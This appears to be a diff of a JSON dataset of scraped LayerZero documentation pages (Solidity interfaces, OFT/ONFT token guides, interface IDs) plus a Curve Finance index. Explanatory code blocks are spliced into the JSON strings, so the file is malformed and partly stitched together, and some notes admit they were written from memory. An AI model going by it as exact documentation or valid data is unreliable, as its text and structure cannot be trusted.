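    function supportsInterface(bytes4 interfaceID) external view returns (bool);
}

contract OFTVersionProbe {
    bytes4 internal constant OFT_V1 = 0x14e4ceea;
    bytes4 internal constant OFT_V2 = 0x1f7ecdf7;
    bytes4 internal constant OFT_WITH_FEE = 0x6984a9e8;

    // Returns "OFT(v1)", "OFTV2", "OFTWithFee", or "unknown".
    function probe(address token) external view returns (string memory) {
        if (IERC165Like(token).supportsInterface(OFT_V1)) return "OFT(v1)";
        if (IERC165Like(token).supportsInterface(OFT_V2)) return "OFTV2";
        if (IERC165Like(token).supportsInterface(OFT_WITH_FEE)) return "OFTWithFee";
        return "unknown";
    }
}
```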
https://github.com/LayerZero-Labs/solidity-examples/blob/main/contracts/token/oft/v1/ProxyOFT.sol Previous OFT (V1) vs OFTV2 - Which should I use? Next OFTV2 Last modified 21d ago", "labels": [ "Documentation" ] }, { - "title": "ILayerZeroOracle.sol", - "html_url": "https://layerzero.gitbook.io/docs/evm-guides/interfaces/evm-solidity-interfaces/ilayerzerooracle.sol", - "body": "ILayerZeroOracle.sol // SPDX-License-Identifier: BUSL-1.1 pragma solidity >= 0.7.0 ; interface ILayerZeroOracle { // @notice query the oracle price for relaying block information to the destination chain // @param _dstChainId the destination endpoint identifier // @param _outboundProofType the proof type identifier to specify the data to be relayed function getPrice ( uint16 _dstChainId , uint16 _outboundProofType ) external view returns ( uint price ); // @notice Ultra-Light Node notifies the Oracle of a new block information relaying request // @param _dstChainId the destination endpoint identifier // @param _outboundProofType the proof type identifier to specify the data to be relayed // @param _outboundBlockConfirmations the number of source chain block confirmation needed function notifyOracle ( uint16 _dstChainId , uint16 _outboundProofType , uint64 _outboundBlockConfirmations ) external ; // @notice query if the address is an approved actor for privileges like data submission and fee withdrawal etc. // @param _address the address to be checked function isApproved ( address _address ) external view returns ( bool approved ); } Previous ILayerZeroUserApplicationConfig Next ILayerZeroRelayer.sol Last modified 3mo ago", + "title": "OFT (V1) vs OFTV2 - Which should I use?", + "html_url": "https://layerzero.gitbook.io/docs/evm-guides/layerzero-omnichain-contracts/oft/oft-v1-vs-oftv2-which-should-i-use", + "body": "OFT (V1) vs OFTV2 - Which should I use? This page explains the differences between OFT/OFTV2 and when to use each one. When to use OFT (v1) Our Omnichain Fungible Token (OFT) was our first implementation of our standard. This OFT was first used in projects such as Stargate's token. The standard was written to support EVM chains only. If you are looking to only support EVMs now and forever then OFT (V1) is for you. When to use OFTV2 What if you want to build an Omnichain Fungible Token that supports EVMs and non EVMs (e.g. Aptos)? In this case you should use our OFTV2 which supports both. This version has fees, shared decimals, and composability built in. This version of OFTV2 is currently being used in projects such as BTCb . What are the differences between the two versions? The main difference between the two versions comes from the limitations of non-EVM chains. Non-EVM chains such as Aptos and Solana use uint64 to represent balances. To account for this, OFTV2 uses Shared Decimals for value transfers to normalize the data type difference. It is recommended to use a smaller shared decimal point on all chains so that your token can have a larger balance. For example, if the decimal point is 18, then you cannot have more than approximately 18.4 * 10^18 base units, the bound imposed by uint64.max. OFTV2 is intended to be used with no more than 10 shared decimals. Previous IERC165 OFT Interface Ids Next OFT (V1) Last modified 6d ago", "labels": [ "Documentation" ] }, { - "title": "ILayerZeroReceiver", - "html_url": "https://layerzero.gitbook.io/docs/evm-guides/interfaces/evm-solidity-interfaces/ilayerzeroreceiver", - "body": "ILayerZeroReceiver For User Application contracts to receive messages!
// SPDX-License-Identifier: BUSL-1.1 pragma solidity >= 0.5.0 ; interface ILayerZeroReceiver { // @notice LayerZero endpoint will invoke this function to deliver the message on the destination // @param _srcChainId - the source endpoint identifier // @param _srcAddress - the source sending contract address from the source chain // @param _nonce - the ordered message nonce // @param _payload - the signed payload is the UA bytes has encoded to be sent function lzReceive ( uint16 _srcChainId , bytes calldata _srcAddress , uint64 _nonce , bytes calldata _payload ) external ; } This is a core interface for contract to implement so they can receive LayerZero messages! See the CounterMock example for usage Previous EVM (Solidity) Interfaces Next ILayerZeroEndpoint Last modified 3mo ago", + "title": "OFTV2", + "html_url": "https://layerzero.gitbook.io/docs/evm-guides/layerzero-omnichain-contracts/oft/oftv2", + "body": "OFTV2 Omnichain Fungible Token that supports both EVMs and non EVMs OFTV2.sol solidity-examples/OFTV2.sol at main LayerZero-Labs/solidity-examples GitHub Extensions ProxyOFTV2.sol Use this extension when you want to turn an already deployed ERC20 into an OFTV2. You can then deploy OFTV2 contracts on the LayerZero-supported chains of your choosing. When you want to transfer your OFT from the source chain the OFT will lock in the ProxyOFTV2 and mint on the destination chain. When you come back to the ProxyOFTV2 chain the OFT burns on the source chain and unlocks on the destination chain. solidity-examples/ProxyOFTV2.sol at main LayerZero-Labs/solidity-examples GitHub How to deploy ProxyOFT and OFT Contracts 1. Deploy your ProxyOFT contract using your ERC-20 address, and specify the shared decimals (i.e. where your ERC-20 decimals > shared decimals). 2. Deploy your OFT contract on the other connected chain(s) and specify the shared decimals in relation to your ERC-20 & ProxyOFT. 3. Set your contracts to trust one another using setTrustedRemoteAddress. Pair them to one another's chain and address. 4. Next, we're going to set our minimum Gas Limit for each chain. (Recommended 200k for all EVM chains except Arbitrum, 2M for Arbitrum). Call setMinDstGas with the chainId of the other chain, the packet type (\"0\" meaning send, \"1\" meaning send and call), and the gas limit amount. (Make sure that your AdapterParams gas limit > setMinDstGas) If providedGasLimit < minGasLimit , it'd fail: \"LZApp: gas limit is too low\" , where providedGasLimit is _getGasLimit ( provided in _adapterParams ) and minGasLimit is minDstGasLimit (see the sketch after this entry) FAQ If I only have tokens on EVM chains, can I use V2? Yes, you can, just make sure to set shared decimals as <= 10 if your token decimals are 18. What is shared decimals? Shared Decimals is used to normalize the data type difference across EVM and non-EVM chains. Non-EVM chains often have a Uint64 data type which limits the decimals of the token to a lower amount. Shared Decimals accounts for this and translates the higher decimals on EVM chains to the lower decimals on non-EVM chains. What should I set as shared decimals? If your token is deployed on non-EVM chains, it should be set as the lowest decimals across all chains. For example, if your token is deployed on Aptos as decimal 6 and your Ethereum token is deployed as decimal 18, Shared Decimals should be set as 6. If your tokens are only deployed on EVM chains and all have decimals larger than 8, it should be set as 8. For example, if your tokens on all EVM chains have decimals of 18, the shared decimals on all chains should be set as 8.
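The gas-limit rule in step 4 reduces to a lookup plus a require. A sketch of the LzApp-style check, assuming a minDstGasLookup mapping keyed by destination chain and packet type; names mirror the solidity-examples repository from memory and should be treated as illustrative:

```solidity
// Sketch only: the minimum-destination-gas check behind "LZApp: gas limit is too low".
// Storage layout and names are illustrative rather than authoritative.
pragma solidity ^0.8.17;

abstract contract MinGasCheckExample {
    // dstChainId => packet type (0 = send, 1 = send and call) => minimum gas
    mapping(uint16 => mapping(uint16 => uint256)) public minDstGasLookup;

    function _checkGasLimit(uint16 dstChainId, uint16 packetType, uint256 providedGasLimit) internal view {
        uint256 minGasLimit = minDstGasLookup[dstChainId][packetType];
        require(minGasLimit > 0, "LZApp: minGasLimit not set");
        // the send reverts when the adapter-params gas is below the configured minimum
        require(providedGasLimit >= minGasLimit, "LZApp: gas limit is too low");
    }
}
```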
shared decimals should be set lower than 8 if you want a larger maximum send amount. Check below. How does shared decimals affect my OFT? It affects the minimum and maximum tokens you can send cross-chain. The minimum tokens you can send: 10 * ( 10^( decimals - _sharedDecimals)) The maximum tokens you can send: 18,446,744,073,709,551,615 * ( 10^( decimals - _sharedDecimals)) Previous OFT (V1) Next ONFT Last modified 1d ago", "labels": [ "Documentation" ] }, { - "title": "ILayerZeroRelayer.sol", - "html_url": "https://layerzero.gitbook.io/docs/evm-guides/interfaces/evm-solidity-interfaces/ilayerzerorelayer.sol", - "body": "ILayerZeroRelayer.sol // SPDX-License-Identifier: BUSL-1.1 pragma solidity >= 0.7.0 ; interface ILayerZeroRelayer { // @notice query the relayer price for relaying the payload and its proof to the destination chain // @param _dstChainId - the destination endpoint identifier // @param _outboundProofType - the proof type identifier to specify proof to be relayed // @param _userApplication - the source sending contract address. relayers may apply price discrimination to user apps // @param _payloadSize - the length of the payload. it is an indicator of gas usage for relaying cross-chain messages // @param _adapterParams - optional parameters for extra service plugins, e.g. sending dust tokens at the destination chain function getPrice ( uint16 _dstChainId , uint16 _outboundProofType , address _userApplication , uint _payloadSize , bytes calldata _adapterParams ) external view returns ( uint price ); // @notice Ultra-Light Node notifies the Oracle of a new block information relaying request // @param _dstChainId - the destination endpoint identifier // @param _outboundProofType - the proof type identifier to specify the data to be relayed // @param _adapterParams - optional parameters for extra service plugins, e.g. sending dust tokens at the destination chain function notifyRelayer ( uint16 _dstChainId , uint16 _outboundProofType , bytes calldata _adapterParams ) external ; // @notice query if the address is an approved actor for privileges like data submission and fee withdrawal etc. // @param _address - the address to be checked function isApproved ( address _address ) external view returns ( bool approved ); } Previous ILayerZeroOracle.sol Next - EVM Guides Error Messages Last modified 3mo ago", + "title": "1155", + "html_url": "https://layerzero.gitbook.io/docs/evm-guides/layerzero-omnichain-contracts/onft/1155", + "body": "1155 Omnichain NonFungible Token (ONFT1155) ONFT1155.sol https://github.com/LayerZero-Labs/solidity-examples/blob/main/contracts/token/onft1155/ONFT1155.sol Extensions ProxyONFT1155.sol Use this extension when you want to turn an already deployed ERC1155 into an ONFT1155. You can then deploy ONFT1155 contracts on the LayerZero supported chains of your choosing. When you want to transfer your ONFT1155 from the source chain the ONFT1155 will lock in the ProxyONFT1155 and mint on the destination chain. When you come back to the ProxyONFT1155 chain the ONFT1155 burns on the source chain and unlocks on the destination chain. 
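Plugging concrete numbers into the min/max formulas above: with decimals = 18 and _sharedDecimals = 8, the conversion rate is 10^(18-8) = 10^10. A sketch of the resulting bounds; the contract and function names are illustrative:

```solidity
// Sketch only: the send bounds implied by the formulas above,
// instantiated for decimals = 18 and _sharedDecimals = 8.
pragma solidity ^0.8.17;

contract SharedDecimalBounds {
    uint8 public constant DECIMALS = 18;
    uint8 public constant SHARED_DECIMALS = 8;
    // conversion rate between local and shared decimals: 10^(18 - 8) = 1e10
    uint256 public constant RATE = 10 ** uint256(DECIMALS - SHARED_DECIMALS);

    // minimum: 10 * 10^(decimals - _sharedDecimals) = 1e11 base units
    function minSend() external pure returns (uint256) {
        return 10 * RATE;
    }

    // maximum: 18,446,744,073,709,551,615 * 10^(decimals - _sharedDecimals)
    // base units, i.e. uint64.max scaled back to local decimals
    function maxSend() external pure returns (uint256) {
        return uint256(type(uint64).max) * RATE;
    }
}
```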
https://github.com/LayerZero-Labs/solidity-examples/blob/main/contracts/token/onft1155/ProxyONFT1155.sol Previous 721 Next - EVM Guides LayerZero Integration Checklist Last modified 21d ago", "labels": [ "Documentation" ] }, { - "title": "ILayerZeroUserApplicationConfig", - "html_url": "https://layerzero.gitbook.io/docs/evm-guides/interfaces/evm-solidity-interfaces/ilayerzerouserapplicationconfig", - "body": "ILayerZeroUserApplicationConfig ILayerZeroUserApplicationConfig.sol // SPDX-License-Identifier: BUSL-1.1 pragma solidity >= 0.5.0 ; interface ILayerZeroUserApplicationConfig { // @notice set the configuration of the LayerZero messaging library of the specified version // @param _version - messaging library version // @param _chainId - the chainId for the pending config change // @param _configType - type of configuration. every messaging library has its own convention. // @param _config - configuration in the bytes. can encode arbitrary content. function setConfig ( uint16 _version , uint16 _chainId , uint _configType , bytes calldata _config ) external ; // @notice set the send() LayerZero messaging library version to _version // @param _version - new messaging library version function setSendVersion ( uint16 _version ) external ; // @notice set the lzReceive() LayerZero messaging library version to _version // @param _version - new messaging library version function setReceiveVersion ( uint16 _version ) external ; // @notice Only when the UA needs to resume the message flow in blocking mode and clear the stored payload // @param _srcChainId - the chainId of the source chain // @param _srcAddress - the contract address of the source contract at the source chain function forceResumeReceive ( uint16 _srcChainId , bytes calldata _srcAddress ) external ; } Previous ILayerZeroMessagingLibrary Next ILayerZeroOracle.sol Last modified 3mo ago", + "title": "721", + "html_url": "https://layerzero.gitbook.io/docs/evm-guides/layerzero-omnichain-contracts/onft/721", + "body": "721 Omnichain NonFungible Token (ONFT721) ONFT721.sol https://github.com/LayerZero-Labs/solidity-examples/blob/main/contracts/token/onft721/ONFT721.sol Extensions ProxyONFT721.sol Use this extension when you want to turn an already deployed ERC721 into an ONFT721. You can then deploy ONFT contracts on the LayerZero supported chains of your choosing. When you want to transfer your ONFT from the source chain the ONFT will lock in the ProxyONFT721 and mint on the destination chain. When you come back to the ProxyONFT721 chain the ONFT locks on the source chain and unlocks on the destination chain. https://github.com/LayerZero-Labs/solidity-examples/blob/main/contracts/token/onft721/ProxyONFT721.sol Previous ONFT Next 1155 Last modified 21d ago", "labels": [ "Documentation" ] }, { - "title": "IERC165 OFT Interface Ids", - "html_url": "https://layerzero.gitbook.io/docs/evm-guides/layerzero-omnichain-contracts/oft/ierc165-oft-interface-ids", - "body": "IERC165 OFT Interface Ids Use these interface ids to determine which version of OFT is deployed. OFT(v1): 0x14e4ceea OFTV2: 0x1f7ecdf7 OFTWithFee: 0x6984a9e8 interface ERC165 { /// @notice Query if a contract implements an interface /// @param interfaceID The interface identifier, as specified in ERC-165 /// @dev Interface identification is specified in ERC-165. This function /// uses less than 30,000 gas. 
/// @return `true` if the contract implements `interfaceID` and /// `interfaceID` is not 0xffffffff, `false` otherwise function supportsInterface(bytes4 interfaceID) external view returns (bool); } Example Hardhat Task module . exports = async function ( taskArgs ) { const OFTInterfaceId = 0x14e4ceea ; const OFTV2InterfaceId = 0x1f7ecdf7 ; const OFTWithFeeInterfaceId = 0x6984a9e8 ; const ERC165ABI = [ \"function supportsInterface(bytes4) public view returns (bool)\" ]; try { const contract = await ethers . getContractAt ( ERC165ABI , taskArgs . address ); const isOFT = await contract . supportsInterface ( OFTInterfaceId ); const isOFTV2 = await contract . supportsInterface ( OFTV2InterfaceId ); const isOFTWithFee = await contract . supportsInterface ( OFTWithFeeInterfaceId ); if ( isOFT ) { console . log ( ` address: ${ taskArgs . address } is OFT(v1) ` ) } else if ( isOFTV2 ) { console . log ( ` address: ${ taskArgs . address } is OFTV2 ` ) } else if ( isOFTWithFee ) { console . log ( ` address: ${ taskArgs . address } is OFTWithFee ` ) } else { console . log ( ` address: ${ taskArgs . address } is not an OFT ` ) } } catch ( e ) { console . log ( \"supportsInterface not implemented\" ) } } Previous OFT Next OFT (V1) vs OFTV2 - Which should I use? Last modified 2mo ago", + "title": "ILayerZeroEndpoint", + "html_url": "https://layerzero.gitbook.io/docs/technical-reference/interfaces/evm-solidity-interfaces/ilayerzeroendpoint", + "body": "ILayerZeroEndpoint // SPDX-License-Identifier: BUSL-1.1 pragma solidity >= 0.5.0 ; import \"./ILayerZeroUserApplicationConfig.sol\" ; interface ILayerZeroEndpoint is ILayerZeroUserApplicationConfig { // @notice send a LayerZero message to the specified address at a LayerZero endpoint. // @param _dstChainId - the destination chain identifier // @param _destination - the address on destination chain (in bytes). address length/format may vary by chains // @param _payload - a custom bytes payload to send to the destination contract // @param _refundAddress - if the source transaction is cheaper than the amount of value passed, refund the additional amount to this address // @param _zroPaymentAddress - the address of the ZRO token holder who would pay for the transaction // @param _adapterParams - parameters for custom functionality. e.g. 
receive airdropped native gas from the relayer on destination function send ( uint16 _dstChainId , bytes calldata _destination , bytes calldata _payload , address payable _refundAddress , address _zroPaymentAddress , bytes calldata _adapterParams ) external payable ; // @notice used by the messaging library to publish verified payload // @param _srcChainId - the source chain identifier // @param _srcAddress - the source contract (as bytes) at the source chain // @param _dstAddress - the address on destination chain // @param _nonce - the unbound message ordering nonce // @param _gasLimit - the gas limit for external contract execution // @param _payload - verified payload to send to the destination contract function receivePayload ( uint16 _srcChainId , bytes calldata _srcAddress , address _dstAddress , uint64 _nonce , uint _gasLimit , bytes calldata _payload ) external ; // @notice get the inboundNonce of a receiver from a source chain which could be EVM or non-EVM chain // @param _srcChainId - the source chain identifier // @param _srcAddress - the source chain contract address function getInboundNonce ( uint16 _srcChainId , bytes calldata _srcAddress ) external view returns ( uint64 ); // @notice get the outboundNonce from this source chain which, consequently, is always an EVM // @param _srcAddress - the source chain contract address function getOutboundNonce ( uint16 _dstChainId , address _srcAddress ) external view returns ( uint64 ); // @notice gets a quote in source native gas, for the amount that send() requires to pay for message delivery // @param _dstChainId - the destination chain identifier // @param _userApplication - the user app address on this EVM chain // @param _payload - the custom message to send over LayerZero // @param _payInZRO - if false, user app pays the protocol fee in native token // @param _adapterParam - parameters for the adapter service, e.g. send some dust native token to dstChain function estimateFees ( uint16 _dstChainId , address _userApplication , bytes calldata _payload , bool _payInZRO , bytes calldata _adapterParam ) external view returns ( uint nativeFee , uint zroFee ); // @notice get this Endpoint's immutable source identifier function getChainId () external view returns ( uint16 ); // @notice the interface to retry failed message on this Endpoint destination // @param _srcChainId - the source chain identifier // @param _srcAddress - the source chain contract address // @param _payload - the payload to be retried function retryPayload ( uint16 _srcChainId , bytes calldata _srcAddress , bytes calldata _payload ) external ; // @notice query if any STORED payload (message blocking) at the endpoint. // @param _srcChainId - the source chain identifier // @param _srcAddress - the source chain contract address function hasStoredPayload ( uint16 _srcChainId , bytes calldata _srcAddress ) external view returns ( bool ); // @notice query if the _libraryAddress is valid for sending msgs. // @param _userApplication - the user app address on this EVM chain function getSendLibraryAddress ( address _userApplication ) external view returns ( address ); // @notice query if the _libraryAddress is valid for receiving msgs. // @param _userApplication - the user app address on this EVM chain function getReceiveLibraryAddress ( address _userApplication ) external view returns ( address ); // @notice query if the non-reentrancy guard for send() is on // @return true if the guard is on. 
false otherwise function isSendingPayload () external view returns ( bool ); // @notice query if the non-reentrancy guard for receive() is on // @return true if the guard is on. false otherwise function isReceivingPayload () external view returns ( bool ); // @notice get the configuration of the LayerZero messaging library of the specified version // @param _version - messaging library version // @param _chainId - the chainId for the pending config change // @param _userApplication - the contract address of the user application // @param _configType - type of configuration. every messaging library has its own convention. function getConfig ( uint16 _version , uint16 _chainId , address _userApplication , uint _configType ) external view returns ( bytes memory ); // @notice get the send() LayerZero messaging library version // @param _userApplication - the contract address of the user application function getSendVersion ( address _userApplication ) external view returns ( uint16 ); // @notice get the lzReceive() LayerZero messaging library version // @param _userApplication - the contract address of the user application function getReceiveVersion ( address _userApplication ) external view returns ( uint16 ); } Previous ILayerZeroReceiver Next ILayerZeroMessagingLibrary Last modified 21d ago", "labels": [ "Documentation" ] }, { - "title": "OFT (V1)", - "html_url": "https://layerzero.gitbook.io/docs/evm-guides/layerzero-omnichain-contracts/oft/oft-v1", - "body": "OFT (V1) Omnichain Fungible Token standard written to support EVM chains only. OFT.sol solidity-examples/OFT.sol at main LayerZero-Labs/solidity-examples GitHub Extensions ProxyOFT.sol Use this extension when you want to turn an already deployed ERC20 into an OFT. You can then deploy OFT contracts on the LayerZero supported chains of your choosing. When you want to transfer your OFT from the source chain the OFT will lock in the ProxyOFT and mint on the destination chain. When you come back to the ProxyOFT chain the OFT burns on the source chain and unlocks on the destination chain. solidity-examples/ProxyOFT.sol at main LayerZero-Labs/solidity-examples GitHub Previous OFT (V1) vs OFTV2 - Which should I use? Next OFTV2 Last modified 7mo ago", + "title": "ILayerZeroMessagingLibrary", + "html_url": "https://layerzero.gitbook.io/docs/technical-reference/interfaces/evm-solidity-interfaces/ilayerzeromessaginglibrary", + "body": "ILayerZeroMessagingLibrary // SPDX-License-Identifier: BUSL-1.1 pragma solidity >= 0.7.0 ; import \"./ILayerZeroUserApplicationConfig.sol\" ; interface ILayerZeroMessagingLibrary { // send(), messages will be inflight. 
function send ( address _userApplication , uint64 _lastNonce , uint16 _chainId , bytes calldata _destination , bytes calldata _payload , address payable refundAddress , address _zroPaymentAddress , bytes calldata _adapterParams ) external payable ; // estimate native fee at the send side function estimateFees ( uint16 _chainId , address _userApplication , bytes calldata _payload , bool _payInZRO , bytes calldata _adapterParam ) external view returns ( uint nativeFee , uint zroFee ); //--------------------------------------------------------------------------- // setConfig / getConfig are User Application (UA) functions to specify Oracle, Relayer, blockConfirmations, libraryVersion function setConfig ( uint16 _chainId , address _userApplication , uint _configType , bytes calldata _config ) external ; function getConfig ( uint16 _chainId , address _userApplication , uint _configType ) external view returns ( bytes memory ); } Previous ILayerZeroEndpoint Next ILayerZeroUserApplicationConfig Last modified 21d ago", "labels": [ "Documentation" ] }, { - "title": "OFT (V1) vs OFTV2 - Which should I use?", - "html_url": "https://layerzero.gitbook.io/docs/evm-guides/layerzero-omnichain-contracts/oft/oft-v1-vs-oftv2-which-should-i-use", - "body": "OFT (V1) vs OFTV2 - Which should I use? This page explains the differences between OFT/OFTV2 and when to use each one. When to use OFT (v1) Our Omnichain Fungible Token (OFT) was our first implementation of our standard. This OFT was first used in projects such as Stargate's token. The standard was written to support EVM chains only. If you are looking to only support EVMs now and forever then OFT (V1) is for you. When to use OFTV2 What if you want to build an Omnichain Fungible Token that supports EVMs and non EVMs (eg. Aptos)? In this case you should use our OFTV2 which supports both. This version has fees, shared decimals, and composability built in. This version of OFTV2 is currently being used in projects such as BTCb . What are the differences between the two versions? The main difference between the two versions comes from the limitations of the Non EVMs. Non EVM chains such as Aptos/Solana use Uint64 to represent balance. To account for this, OFTV2 uses Shared Decimals for value transfers to normalize the data type difference. It is recommended to use a smaller shared decimal point on all chains so that your token can have a larger balance. For example, if the decimal point is 18, then you can not have more than approximately 18 * 10^18 tokens bounded by the uint64.max. 
OFTV2 is intended to be used with no more than 10 shared decimals Previous IERC165 OFT Interface Ids Next OFT (V1) Last modified 7mo ago", + "title": "ILayerZeroOracle.sol", + "html_url": "https://layerzero.gitbook.io/docs/technical-reference/interfaces/evm-solidity-interfaces/ilayerzerooracle.sol", + "body": "ILayerZeroOracle.sol // SPDX-License-Identifier: BUSL-1.1 pragma solidity >= 0.7.0 ; interface ILayerZeroOracle { // @notice query the oracle price for relaying block information to the destination chain // @param _dstChainId the destination endpoint identifier // @param _outboundProofType the proof type identifier to specify the data to be relayed function getPrice ( uint16 _dstChainId , uint16 _outboundProofType ) external view returns ( uint price ); // @notice Ultra-Light Node notifies the Oracle of a new block information relaying request // @param _dstChainId the destination endpoint identifier // @param _outboundProofType the proof type identifier to specify the data to be relayed // @param _outboundBlockConfirmations the number of source chain block confirmation needed function notifyOracle ( uint16 _dstChainId , uint16 _outboundProofType , uint64 _outboundBlockConfirmations ) external ; // @notice query if the address is an approved actor for privileges like data submission and fee withdrawal etc. // @param _address the address to be checked function isApproved ( address _address ) external view returns ( bool approved ); } Previous ILayerZeroUserApplicationConfig Next ILayerZeroRelayer.sol Last modified 21d ago", "labels": [ "Documentation" ] }, { - "title": "OFTV2", - "html_url": "https://layerzero.gitbook.io/docs/evm-guides/layerzero-omnichain-contracts/oft/oftv2", - "body": "OFTV2 Omnichain Fungible Token that supports both EVMs and non EVMs OFTV2.sol solidity-examples/OFTV2.sol at main LayerZero-Labs/solidity-examples GitHub Extensions ProxyOFTV2.sol Use this extension when you want to turn an already deployed ERC20 into an OFTV2. You can then deploy OFTV2 contracts on the LayerZero supported chains of your choosing. When you want to transfer your OFT from the source chain the OFT will lock in the ProxyOFTV2 and mint on the destination chain. When you come back to the ProxyOFTV2 chain the OFT burns on the source chain and unlocks on the destination chain. solidity-examples/ProxyOFTV2.sol at main LayerZero-Labs/solidity-examples GitHub Previous OFT (V1) Next ONFT Last modified 7mo ago", + "title": "ILayerZeroReceiver", + "html_url": "https://layerzero.gitbook.io/docs/technical-reference/interfaces/evm-solidity-interfaces/ilayerzeroreceiver", + "body": "ILayerZeroReceiver For User Application contracts to receive messages! // SPDX-License-Identifier: BUSL-1.1 pragma solidity >= 0.5.0 ; interface ILayerZeroReceiver { // @notice LayerZero endpoint will invoke this function to deliver the message on the destination // @param _srcChainId - the source endpoint identifier // @param _srcAddress - the source sending contract address from the source chain // @param _nonce - the ordered message nonce // @param _payload - the payload is the bytes the UA has encoded to be sent function lzReceive ( uint16 _srcChainId , bytes calldata _srcAddress , uint64 _nonce , bytes calldata _payload ) external ; } This is a core interface for contracts to implement so they can receive LayerZero messages!
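Since lzReceive is the one surface every receiving UA must expose, a minimal implementation looks like the sketch below; the endpoint-only check and the contract name are illustrative assumptions, and production UAs (like the CounterMock referenced next) also validate _srcAddress against a trusted remote:

```solidity
// Sketch only: a minimal User Application implementing the interface above.
pragma solidity ^0.8.17;

interface ILayerZeroReceiver {
    function lzReceive(uint16 _srcChainId, bytes calldata _srcAddress, uint64 _nonce, bytes calldata _payload) external;
}

contract ReceiverExample is ILayerZeroReceiver {
    address public immutable endpoint; // the local LayerZero endpoint
    bytes public lastPayload;

    constructor(address _endpoint) {
        endpoint = _endpoint;
    }

    function lzReceive(
        uint16 /* _srcChainId */,
        bytes calldata /* _srcAddress */,
        uint64 /* _nonce */,
        bytes calldata _payload
    ) external override {
        // only the endpoint may deliver messages
        require(msg.sender == endpoint, "ReceiverExample: caller must be the endpoint");
        // a real UA would also check _srcAddress against a trusted remote before acting
        lastPayload = _payload;
    }
}
```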
See the CounterMock example for usage Previous EVM (Solidity) Interfaces Next ILayerZeroEndpoint Last modified 4mo ago", "labels": [ "Documentation" ] }, { - "title": "1155", - "html_url": "https://layerzero.gitbook.io/docs/evm-guides/layerzero-omnichain-contracts/onft/1155", - "body": "1155 Omnichain NonFungible Token (ONFT1155) ONFT1155.sol solidity-examples/ONFT1155.sol at main LayerZero-Labs/solidity-examples GitHub Extensions ProxyONFT1155.sol Use this extension when you want to turn an already deployed ERC1155 into an ONFT1155. You can then deploy ONFT1155 contracts on the LayerZero supported chains of your choosing. When you want to transfer your ONFT1155 from the source chain the ONFT1155 will lock in the ProxyONFT1155 and mint on the destination chain. When you come back to the ProxyONFT1155 chain the ONFT1155 burns on the source chain and unlocks on the destination chain. solidity-examples/ProxyONFT1155.sol at main LayerZero-Labs/solidity-examples GitHub Previous 721 Next - EVM Guides LayerZero Integration Checklist Last modified 7mo ago", + "title": "ILayerZeroRelayer.sol", + "html_url": "https://layerzero.gitbook.io/docs/technical-reference/interfaces/evm-solidity-interfaces/ilayerzerorelayer.sol", + "body": "ILayerZeroRelayer.sol // SPDX-License-Identifier: BUSL-1.1 pragma solidity >= 0.7.0 ; interface ILayerZeroRelayer { // @notice query the relayer price for relaying the payload and its proof to the destination chain // @param _dstChainId - the destination endpoint identifier // @param _outboundProofType - the proof type identifier to specify proof to be relayed // @param _userApplication - the source sending contract address. relayers may apply price discrimination to user apps // @param _payloadSize - the length of the payload. it is an indicator of gas usage for relaying cross-chain messages // @param _adapterParams - optional parameters for extra service plugins, e.g. sending dust tokens at the destination chain function getPrice ( uint16 _dstChainId , uint16 _outboundProofType , address _userApplication , uint _payloadSize , bytes calldata _adapterParams ) external view returns ( uint price ); // @notice Ultra-Light Node notifies the Oracle of a new block information relaying request // @param _dstChainId - the destination endpoint identifier // @param _outboundProofType - the proof type identifier to specify the data to be relayed // @param _adapterParams - optional parameters for extra service plugins, e.g. sending dust tokens at the destination chain function notifyRelayer ( uint16 _dstChainId , uint16 _outboundProofType , bytes calldata _adapterParams ) external ; // @notice query if the address is an approved actor for privileges like data submission and fee withdrawal etc. // @param _address - the address to be checked function isApproved ( address _address ) external view returns ( bool approved ); } Previous ILayerZeroOracle.sol Next - Technical Reference LayerZero Interfaces Last modified 21d ago", "labels": [ "Documentation" ] }, { - "title": "721", - "html_url": "https://layerzero.gitbook.io/docs/evm-guides/layerzero-omnichain-contracts/onft/721", - "body": "721 Omnichain NonFungible Token (ONFT721) ONFT721.sol solidity-examples/ONFT721.sol at main LayerZero-Labs/solidity-examples GitHub Extensions ProxyONFT721.sol Use this extension when you want to turn an already deployed ERC721 into an ONFT721. You can then deploy ONFT contracts on the LayerZero supported chains of your choosing. 
When you want to transfer your ONFT from the source chain the ONFT will lock in the ProxyONFT721 and mint on the destination chain. When you come back to the ProxyONFT721 chain the ONFT burns on the source chain and unlocks on the destination chain. solidity-examples/ProxyONFT721.sol at main LayerZero-Labs/solidity-examples GitHub Previous ONFT Next 1155 Last modified 7mo ago", + "title": "ILayerZeroUserApplicationConfig", + "html_url": "https://layerzero.gitbook.io/docs/technical-reference/interfaces/evm-solidity-interfaces/ilayerzerouserapplicationconfig", + "body": "ILayerZeroUserApplicationConfig ILayerZeroUserApplicationConfig.sol // SPDX-License-Identifier: BUSL-1.1 pragma solidity >= 0.5.0 ; interface ILayerZeroUserApplicationConfig { // @notice set the configuration of the LayerZero messaging library of the specified version // @param _version - messaging library version // @param _chainId - the chainId for the pending config change // @param _configType - type of configuration. every messaging library has its own convention. // @param _config - configuration in the bytes. can encode arbitrary content. function setConfig ( uint16 _version , uint16 _chainId , uint _configType , bytes calldata _config ) external ; // @notice set the send() LayerZero messaging library version to _version // @param _version - new messaging library version function setSendVersion ( uint16 _version ) external ; // @notice set the lzReceive() LayerZero messaging library version to _version // @param _version - new messaging library version function setReceiveVersion ( uint16 _version ) external ; // @notice Only when the UA needs to resume the message flow in blocking mode and clear the stored payload // @param _srcChainId - the chainId of the source chain // @param _srcAddress - the contract address of the source contract at the source chain function forceResumeReceive ( uint16 _srcChainId , bytes calldata _srcAddress ) external ; } Previous ILayerZeroMessagingLibrary Next ILayerZeroOracle.sol Last modified 21d ago", "labels": [ "Documentation" ] }, { - "title": "Home", + "title": " ", "html_url": "https://resources.curve.fi/", - "body": "Curve Resources CurveDocs/curve-resources Home Home Table of contents Welcome to Curve Finance Sections Useful links Getting Started Getting Started Understanding curve Understanding crypto pools $crvUSD $crvUSD Understanding crvusd Markets Loan creation Loan details Understanding tokenomics FAQ $CRV Token $CRV Token Understanding crv Crv basics Crv tokenomics Staking your crv Claiming trading fees Liquidity Providers Liquidity Providers Understanding curve pools Base and metapools Deposit faqs Calculating yield Depositing Depositing Depositing Depositing into a metapool Depositing into the susd pool Depositing into the tri pool Depositing into the y pool Reward Gauges Reward Gauges Understanding gauges Creating a pool gauge Boosting your crv rewards Gauge weights Governance Governance Understanding governance Vote locking boost Voting Snapshot Proposals Proposals Proposals Community fund Creating a dao proposal Multichain Multichain Understanding multichain 